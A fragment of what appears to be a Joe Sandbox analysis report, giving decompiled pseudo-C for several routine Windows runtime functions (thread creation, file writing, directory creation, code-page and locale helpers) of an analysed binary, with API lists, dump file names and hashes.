                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3177248105-0
                                                    • Opcode ID: 1fe44525917c1585e5cff54f7c58167ac2400f31948403711f43afed5a36b87a
                                                    • Instruction ID: edf6b42aed365bb0b5e3328558e63d95bef0eb2d7aa2d03fa4ecbbeb2834bd10
                                                    • Opcode Fuzzy Hash: 1fe44525917c1585e5cff54f7c58167ac2400f31948403711f43afed5a36b87a
                                                    • Instruction Fuzzy Hash: 7601F7362012A2BFC7214B6A9C44BAB7B58EF05BA27110620F916D3550DB25EB01C6E2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 67%
                                                    			E00CD101F() {
                                                    				long _v4;
                                                    				void* __ecx;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t5;
                                                    				void* _t7;
                                                    				int _t8;
                                                    				void* _t12;
                                                    				void** _t18;
                                                    				void* _t22;
                                                    
                                                    				_t12 = 0;
                                                    				if( *0xd01098 > 0) {
                                                    					_t18 = 0xd0109c;
                                                    					do {
                                                    						_t7 = CreateThread(0, 0x10000, E00CD1160, 0xd01098, 0,  &_v4); // executed
                                                    						_t22 = _t7;
                                                    						_t25 = _t22;
                                                    						if(_t22 == 0) {
                                                    							_push(L"CreateThread failed");
                                                    							_push(0xd01098);
                                                    							E00CC6C36(0xd01098);
                                                    							E00CC6C31(E00CC6DCB(0xd01098, _t25), 0xd01098, 0xd01098, 2);
                                                    						}
                                                    						 *_t18 = _t22;
                                                    						 *0x00D0119C =  *((intOrPtr*)(0xd0119c)) + 1;
                                                    						_t8 =  *0xd081e0; // 0x0
                                                    						if(_t8 != 0) {
                                                    							_t8 = SetThreadPriority( *_t18, _t8);
                                                    						}
                                                    						_t12 = _t12 + 1;
                                                    						_t18 =  &(_t18[1]);
                                                    					} while (_t12 <  *0xd01098);
                                                    					return _t8;
                                                    				}
                                                    				return _t5;
                                                    			}














                                                    APIs
                                                    • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00CD1043
                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 00CD108A
                                                      • Part of subcall function 00CC6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC6C54
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                    • String ID: CreateThread failed
                                                    • API String ID: 2655393344-3849766595
                                                    • Opcode ID: 49e9d9b7b191eb955f366060037c9b91fdbedacc2e9031cf4e0ade25799ef18d
                                                    • Instruction ID: 97df4a88994c7d4a28464b8da6e808a5c9613c0f53dbb3127b493d5bd7711cf1
                                                    • Opcode Fuzzy Hash: 49e9d9b7b191eb955f366060037c9b91fdbedacc2e9031cf4e0ade25799ef18d
                                                    • Instruction Fuzzy Hash: 4101A2B93443497BD3346E64ED51F7A7398EB41751F24002FFA8692380CAE168858625
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E00CC9F7A() {
                                                    				void* __ecx;
                                                    				void* __ebp;
                                                    				long _t37;
                                                    				void* _t42;
                                                    				void* _t46;
                                                    				signed int _t49;
                                                    				intOrPtr* _t53;
                                                    				void** _t54;
                                                    				DWORD* _t61;
                                                    				void* _t65;
                                                    				intOrPtr _t66;
                                                    				long _t67;
                                                    				intOrPtr* _t69;
                                                    				void* _t70;
                                                    
                                                    				_t67 =  *(_t70 + 0x18);
                                                    				_t69 = _t53;
                                                    				if(_t67 != 0) {
                                                    					_t54 = _t69 + 8;
                                                    					 *(_t70 + 0xc) = _t54;
                                                    					if( *((intOrPtr*)(_t69 + 0x10)) != 1) {
                                                    						 *(_t70 + 0xc) = _t54;
                                                    					} else {
                                                    						_t46 = GetStdHandle(0xfffffff5);
                                                    						_t54 = _t69 + 8;
                                                    						 *_t54 = _t46;
                                                    					}
                                                    					while(1) {
                                                    						 *(_t70 + 0x10) =  *(_t70 + 0x10) & 0x00000000;
                                                    						_t49 = 0;
                                                    						if( *((intOrPtr*)(_t69 + 0x10)) == 0) {
                                                    							goto L13;
                                                    						}
                                                    						_t65 = 0;
                                                    						if(_t67 == 0) {
                                                    							L15:
                                                    							if( *((char*)(_t69 + 0x1e)) == 0 ||  *((intOrPtr*)(_t69 + 0x10)) != 0) {
                                                    								L22:
                                                    								 *((char*)(_t69 + 0xc)) = 1;
                                                    								return _t49;
                                                    							} else {
                                                    								_t64 = _t69 + 0x32;
                                                    								if(E00CC6BAA(0xd01098, _t69 + 0x32, 0) == 0) {
                                                    									E00CC6E98(0xd01098, _t69, 0, _t64);
                                                    									goto L22;
                                                    								}
                                                    								_t54 =  *(_t70 + 0x14);
                                                    								if( *(_t70 + 0x10) < _t67 &&  *(_t70 + 0x10) > 0) {
                                                    									_t66 =  *_t69;
                                                    									 *0xcf3278(0);
                                                    									_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 0x14))))();
                                                    									asm("sbb edx, 0x0");
                                                    									 *0xcf3278(_t42 -  *(_t70 + 0x14), _t61);
                                                    									 *((intOrPtr*)(_t66 + 0x10))();
                                                    									_t67 =  *(_t70 + 0x20);
                                                    									_t54 =  *(_t70 + 0x14);
                                                    								}
                                                    								continue;
                                                    							}
                                                    						} else {
                                                    							goto L8;
                                                    						}
                                                    						while(1) {
                                                    							L8:
                                                    							_t37 = _t67 - _t65;
                                                    							if(_t37 >= 0x4000) {
                                                    								_t37 = 0x4000;
                                                    							}
                                                    							_t61 = _t70 + 0x14;
                                                    							_t13 = WriteFile( *_t54,  *(_t70 + 0x28) + _t65, _t37, _t61, 0) == 1;
                                                    							_t49 = _t49 & 0xffffff00 | _t13;
                                                    							if(_t13 != 0) {
                                                    								break;
                                                    							}
                                                    							_t54 =  *(_t70 + 0x14);
                                                    							_t65 = _t65 + 0x4000;
                                                    							if(_t65 < _t67) {
                                                    								continue;
                                                    							}
                                                    							break;
                                                    						}
                                                    						L14:
                                                    						if(_t49 != 0) {
                                                    							goto L22;
                                                    						}
                                                    						goto L15;
                                                    						L13:
                                                    						WriteFile( *_t54,  *(_t70 + 0x28), _t67, _t70 + 0x14, 0);
                                                    						asm("sbb bl, bl");
                                                    						_t49 = 1;
                                                    						goto L14;
                                                    					}
                                                    				}
                                                    				return 1;
                                                    			}


















                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00CCD343,00000001,?,?,?,00000000,00CD551D,?,?,?), ref: 00CC9F9E
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00CD551D,?,?,?,?,?,00CD4FC7,?), ref: 00CC9FE5
                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00CCD343,00000001,?,?), ref: 00CCA011
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$Handle
                                                    • String ID:
                                                    • API String ID: 4209713984-0
                                                    • Opcode ID: 569eb953b9e19f97f4df6710abc0e56e3b901a90083bebfe7fea6b33e04743f4
                                                    • Instruction ID: b38c8215e631b9e70e08bc9cad3c2ea45145c874d711bd7d3574418246fc2abd
                                                    • Opcode Fuzzy Hash: 569eb953b9e19f97f4df6710abc0e56e3b901a90083bebfe7fea6b33e04743f4
                                                    • Instruction Fuzzy Hash: D231C031204349AFDB14CF20D80CF6EB7A5EF85754F00451DF89297290CB75AE88CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CCA2B2(void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
                                                    				short _v4100;
                                                    				signed int _t11;
                                                    				void* _t14;
                                                    				void* _t17;
                                                    				int _t24;
                                                    				long _t25;
                                                    				WCHAR* _t26;
                                                    				void* _t27;
                                                    
                                                    				_t27 = __eflags;
                                                    				E00CDEC50(0x1000);
                                                    				_t26 = _a4;
                                                    				_t11 =  *(E00CCC27E(_t27, _t26)) & 0x0000ffff;
                                                    				if(_t11 != 0x2e && _t11 != 0x20) {
                                                    					_t24 = CreateDirectoryW(_t26, 0); // executed
                                                    					if(_t24 != 0) {
                                                    						L6:
                                                    						if(_a8 != 0) {
                                                    							E00CCA4ED(_t26, _a12); // executed
                                                    						}
                                                    						return 0;
                                                    					}
                                                    				}
                                                    				if(E00CCA231(_t26) == 0 && E00CCBB03(_t26,  &_v4100, 0x800) != 0 && CreateDirectoryW( &_v4100, 0) != 0) {
                                                    					goto L6;
                                                    				}
                                                    				_t25 = GetLastError();
                                                    				_t14 = 2;
                                                    				__eflags = _t25 - _t14;
                                                    				if(_t25 != _t14) {
                                                    					__eflags = _t25 - 3;
                                                    					_t17 = (0 | _t25 == 0x00000003) + 1;
                                                    					__eflags = _t17;
                                                    					return _t17;
                                                    				}
                                                    				return _t14;
                                                    			}












                                                    APIs
                                                      • Part of subcall function 00CCC27E: _wcslen.LIBCMT ref: 00CCC284
                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA2D9
                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA30C
                                                    • GetLastError.KERNEL32(?,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA329
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                    • String ID:
                                                    • API String ID: 2260680371-0
                                                    • Opcode ID: f39920de5fca2efca15e2ea8b120c7ff515a40072442e72c2635ec1b43f57c48
                                                    • Instruction ID: 752ca8df1bc4bd483af08d2b327e6a53d28a83fb8ad7cd8bbed4708503f00eca
                                                    • Opcode Fuzzy Hash: f39920de5fca2efca15e2ea8b120c7ff515a40072442e72c2635ec1b43f57c48
                                                    • Instruction Fuzzy Hash: 2E01B5712002A86AEF21ABB5CC5DFFD36489F09789F08441DF912D61A1DB54CB81D6B7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 96%
                                                    			E00CEB893(void* __edx, intOrPtr _a4) {
                                                    				signed int _v8;
                                                    				char _v264;
                                                    				char _v520;
                                                    				char _v776;
                                                    				char _v1800;
                                                    				char _v1814;
                                                    				struct _cpinfo _v1820;
                                                    				intOrPtr _v1824;
                                                    				signed char _v1828;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t63;
                                                    				void* _t67;
                                                    				signed char _t68;
                                                    				intOrPtr _t69;
                                                    				void* _t72;
                                                    				char _t73;
                                                    				char _t74;
                                                    				signed char _t75;
                                                    				signed int _t76;
                                                    				signed char _t87;
                                                    				signed int _t90;
                                                    				signed int _t91;
                                                    				signed int _t93;
                                                    				char* _t94;
                                                    				intOrPtr _t96;
                                                    				signed int _t97;
                                                    
                                                    				_t63 =  *0xcfe7ac; // 0x349e4b74
                                                    				_v8 = _t63 ^ _t97;
                                                    				_t96 = _a4;
                                                    				_t4 = _t96 + 4; // 0x5efc4d8b
                                                    				if(GetCPInfo( *_t4,  &_v1820) == 0) {
                                                    					_t47 = _t96 + 0x119; // 0xcebee6
                                                    					_t93 = _t47;
                                                    					_t87 = 0;
                                                    					_t67 = 0xffffff9f;
                                                    					_t68 = _t67 - _t93;
                                                    					__eflags = _t68;
                                                    					_v1828 = _t68;
                                                    					do {
                                                    						_t94 = _t93 + _t87;
                                                    						_t69 = _t68 + _t94;
                                                    						_v1824 = _t69;
                                                    						__eflags = _t69 + 0x20 - 0x19;
                                                    						if(_t69 + 0x20 > 0x19) {
                                                    							__eflags = _v1824 - 0x19;
                                                    							if(_v1824 > 0x19) {
                                                    								 *_t94 = 0;
                                                    							} else {
                                                    								_t72 = _t96 + _t87;
                                                    								_t57 = _t72 + 0x19;
                                                    								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
                                                    								__eflags =  *_t57;
                                                    								_t59 = _t87 - 0x20; // -32
                                                    								_t73 = _t59;
                                                    								goto L24;
                                                    							}
                                                    						} else {
                                                    							 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000010;
                                                    							_t54 = _t87 + 0x20; // 0x20
                                                    							_t73 = _t54;
                                                    							L24:
                                                    							 *_t94 = _t73;
                                                    						}
                                                    						_t68 = _v1828;
                                                    						_t61 = _t96 + 0x119; // 0xcebee6
                                                    						_t93 = _t61;
                                                    						_t87 = _t87 + 1;
                                                    						__eflags = _t87 - 0x100;
                                                    					} while (_t87 < 0x100);
                                                    				} else {
                                                    					_t74 = 0;
                                                    					do {
                                                    						 *((char*)(_t97 + _t74 - 0x104)) = _t74;
                                                    						_t74 = _t74 + 1;
                                                    					} while (_t74 < 0x100);
                                                    					_t75 = _v1814;
                                                    					_t90 =  &_v1814;
                                                    					_v264 = 0x20;
                                                    					while(1) {
                                                    						_t103 = _t75;
                                                    						if(_t75 == 0) {
                                                    							break;
                                                    						}
                                                    						_t93 =  *(_t90 + 1) & 0x000000ff;
                                                    						_t76 = _t75 & 0x000000ff;
                                                    						while(1) {
                                                    							__eflags = _t76 - _t93;
                                                    							if(_t76 > _t93) {
                                                    								break;
                                                    							}
                                                    							__eflags = _t76 - 0x100;
                                                    							if(_t76 < 0x100) {
                                                    								 *((char*)(_t97 + _t76 - 0x104)) = 0x20;
                                                    								_t76 = _t76 + 1;
                                                    								__eflags = _t76;
                                                    								continue;
                                                    							}
                                                    							break;
                                                    						}
                                                    						_t90 = _t90 + 2;
                                                    						__eflags = _t90;
                                                    						_t75 =  *_t90;
                                                    					}
                                                    					_t13 = _t96 + 4; // 0x5efc4d8b
                                                    					E00CEC988(_t93, _t103, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
                                                    					_t16 = _t96 + 4; // 0x5efc4d8b
                                                    					_t19 = _t96 + 0x21c; // 0xdb855708
                                                    					E00CEAB78(0, _t103, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
                                                    					_t21 = _t96 + 4; // 0x5efc4d8b
                                                    					_t23 = _t96 + 0x21c; // 0xdb855708
                                                    					E00CEAB78(0, _t103, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
                                                    					_t91 = 0;
                                                    					do {
                                                    						_t68 =  *(_t97 + _t91 * 2 - 0x704) & 0x0000ffff;
                                                    						if((_t68 & 0x00000001) == 0) {
                                                    							__eflags = _t68 & 0x00000002;
                                                    							if((_t68 & 0x00000002) == 0) {
                                                    								 *(_t96 + _t91 + 0x119) = 0;
                                                    							} else {
                                                    								_t37 = _t96 + _t91 + 0x19;
                                                    								 *_t37 =  *(_t96 + _t91 + 0x19) | 0x00000020;
                                                    								__eflags =  *_t37;
                                                    								_t68 =  *((intOrPtr*)(_t97 + _t91 - 0x304));
                                                    								goto L15;
                                                    							}
                                                    						} else {
                                                    							 *(_t96 + _t91 + 0x19) =  *(_t96 + _t91 + 0x19) | 0x00000010;
                                                    							_t68 =  *((intOrPtr*)(_t97 + _t91 - 0x204));
                                                    							L15:
                                                    							 *(_t96 + _t91 + 0x119) = _t68;
                                                    						}
                                                    						_t91 = _t91 + 1;
                                                    					} while (_t91 < 0x100);
                                                    				}
                                                    				return E00CDFBBC(_t68, 0, _v8 ^ _t97, _t93, 0x100, _t96);
                                                    			}


                                                    APIs
                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00CEB8B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Info
                                                    • String ID:
                                                    • API String ID: 1807457897-3916222277
                                                    • Opcode ID: 1f1455edf55e97627e25a626ac10b9e1ad5850d791c2474e81b9074f6c1b6319
                                                    • Instruction ID: 92b9e9f93c872134a54cd602f560f55df6221085a54b4803d8ac6619156fb471
                                                    • Opcode Fuzzy Hash: 1f1455edf55e97627e25a626ac10b9e1ad5850d791c2474e81b9074f6c1b6319
                                                    • Instruction Fuzzy Hash: 7141D4705043CC9ADB218E668C84BFBBBB9EB45304F1404EDE69A86143D335AE45DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 35%
                                                    			E00CEAF6C(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                                    				signed int _v8;
                                                    				void* __esi;
                                                    				signed int _t18;
                                                    				intOrPtr* _t20;
                                                    				int _t22;
                                                    				void* _t30;
                                                    				intOrPtr* _t33;
                                                    				void* _t34;
                                                    				signed int _t35;
                                                    
                                                    				_t31 = __edi;
                                                    				_t26 = __ecx;
                                                    				_t25 = __ebx;
                                                    				_push(__ecx);
                                                    				_t18 =  *0xcfe7ac; // 0x349e4b74
                                                    				_v8 = _t18 ^ _t35;
                                                    				_t20 = E00CEAC98(0x16, "LCMapStringEx", 0xcf79c4, "LCMapStringEx"); // executed
                                                    				_t33 = _t20;
                                                    				if(_t33 == 0) {
                                                    					_t22 = LCMapStringW(E00CEAFF4(__ebx, _t26, _t30, __edi, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
                                                    				} else {
                                                    					 *0xcf3278(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
                                                    					_t22 =  *_t33();
                                                    				}
                                                    				_pop(_t34);
                                                    				return E00CDFBBC(_t22, _t25, _v8 ^ _t35, _t30, _t31, _t34);
                                                    			}


                                                    APIs
                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 00CEAFDD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: String
                                                    • String ID: LCMapStringEx
                                                    • API String ID: 2568140703-3893581201
                                                    • Opcode ID: 5f53721b55e8636569a98e9252636e6576ad3831beb36c04138e817e0097ffe1
                                                    • Instruction ID: b83b8dc36476b33bcd0162535b7b8f392401cfd5b762aa76264a2065a5854530
                                                    • Opcode Fuzzy Hash: 5f53721b55e8636569a98e9252636e6576ad3831beb36c04138e817e0097ffe1
                                                    • Instruction Fuzzy Hash: 4801483250424EBFCF02AF91DC06EEE7F62EF08750F014255FE1466160CA729A31EB82
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 21%
                                                    			E00CEAF0A(void* __ebx, void* __ecx, void* __edi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
                                                    				signed int _v8;
                                                    				void* __esi;
                                                    				signed int _t8;
                                                    				intOrPtr* _t10;
                                                    				int _t11;
                                                    				void* _t14;
                                                    				void* _t19;
                                                    				void* _t20;
                                                    				intOrPtr* _t22;
                                                    				void* _t23;
                                                    				signed int _t24;
                                                    
                                                    				_t20 = __edi;
                                                    				_t14 = __ebx;
                                                    				_push(__ecx);
                                                    				_t8 =  *0xcfe7ac; // 0x349e4b74
                                                    				_v8 = _t8 ^ _t24;
                                                    				_t10 = E00CEAC98(0x14, "InitializeCriticalSectionEx", 0xcf79a0, "InitializeCriticalSectionEx"); // executed
                                                    				_t22 = _t10;
                                                    				if(_t22 == 0) {
                                                    					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
                                                    				} else {
                                                    					 *0xcf3278(_a4, _a8, _a12);
                                                    					_t11 =  *_t22();
                                                    				}
                                                    				_pop(_t23);
                                                    				return E00CDFBBC(_t11, _t14, _v8 ^ _t24, _t19, _t20, _t23);
                                                    			}


                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00CEA56F), ref: 00CEAF55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalInitializeSectionSpin
                                                    • String ID: InitializeCriticalSectionEx
                                                    • API String ID: 2593887523-3084827643
                                                    • Opcode ID: 29dcb787f1d2f98c507a9758f62a0640bf9140d1cb100988e91a86fb6c602d5e
                                                    • Instruction ID: fc4cbb317f9e729dde203cb9c92dda8b80ea303b88ff294820e25608ee909037
                                                    • Opcode Fuzzy Hash: 29dcb787f1d2f98c507a9758f62a0640bf9140d1cb100988e91a86fb6c602d5e
                                                    • Instruction Fuzzy Hash: 5EF0903164525CBFCF056F51CC06EBD7F61EF04B11B004165F90996260DA715B20E787
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 19%
                                                    			E00CEADAF(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                    				signed int _v8;
                                                    				void* __esi;
                                                    				signed int _t4;
                                                    				intOrPtr* _t6;
                                                    				long _t7;
                                                    				void* _t10;
                                                    				void* _t15;
                                                    				void* _t16;
                                                    				intOrPtr* _t18;
                                                    				void* _t19;
                                                    				signed int _t20;
                                                    
                                                    				_t16 = __edi;
                                                    				_t10 = __ebx;
                                                    				_push(__ecx);
                                                    				_t4 =  *0xcfe7ac; // 0x349e4b74
                                                    				_v8 = _t4 ^ _t20;
                                                    				_t6 = E00CEAC98(3, "FlsAlloc", 0xcf7938, "FlsAlloc"); // executed
                                                    				_t18 = _t6;
                                                    				if(_t18 == 0) {
                                                    					_t7 = TlsAlloc();
                                                    				} else {
                                                    					 *0xcf3278(_a4);
                                                    					_t7 =  *_t18();
                                                    				}
                                                    				_pop(_t19);
                                                    				return E00CDFBBC(_t7, _t10, _v8 ^ _t20, _t15, _t16, _t19);
                                                    			}















                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Alloc
                                                    • String ID: FlsAlloc
                                                    • API String ID: 2773662609-671089009
                                                    • Opcode ID: c782a24ec3ea585948f0adb4b35a2eefad96fca54ed40ba65057072e5a0fc4cc
                                                    • Instruction ID: 798005b770d6f0a61d9d0bf933d7c9e5a7d2a6c30a0f44cb9ffa47f3445649a8
                                                    • Opcode Fuzzy Hash: c782a24ec3ea585948f0adb4b35a2eefad96fca54ed40ba65057072e5a0fc4cc
                                                    • Instruction Fuzzy Hash: 4DE0E531A4521C7BC611AB66DC06F7EBB54DB04B21B0142AAF90597250CDB16F11D6DB
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 90%
                                                    			E00CEBBF0(void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                    				signed int _v8;
                                                    				char _v22;
                                                    				struct _cpinfo _v28;
                                                    				signed int _v32;
                                                    				signed int _v36;
                                                    				void* __ebx;
                                                    				void* __esi;
                                                    				signed int _t48;
                                                    				int _t51;
                                                    				signed int _t54;
                                                    				signed int _t55;
                                                    				short _t58;
                                                    				signed int _t60;
                                                    				signed char _t62;
                                                    				signed int _t63;
                                                    				signed char* _t71;
                                                    				signed char* _t72;
                                                    				int _t75;
                                                    				signed int _t78;
                                                    				signed char* _t79;
                                                    				short* _t80;
                                                    				int _t84;
                                                    				signed char _t85;
                                                    				signed int _t86;
                                                    				signed int _t89;
                                                    				signed int _t90;
                                                    				int _t92;
                                                    				int _t93;
                                                    				intOrPtr _t95;
                                                    				signed int _t96;
                                                    
                                                    				_t91 = __edi;
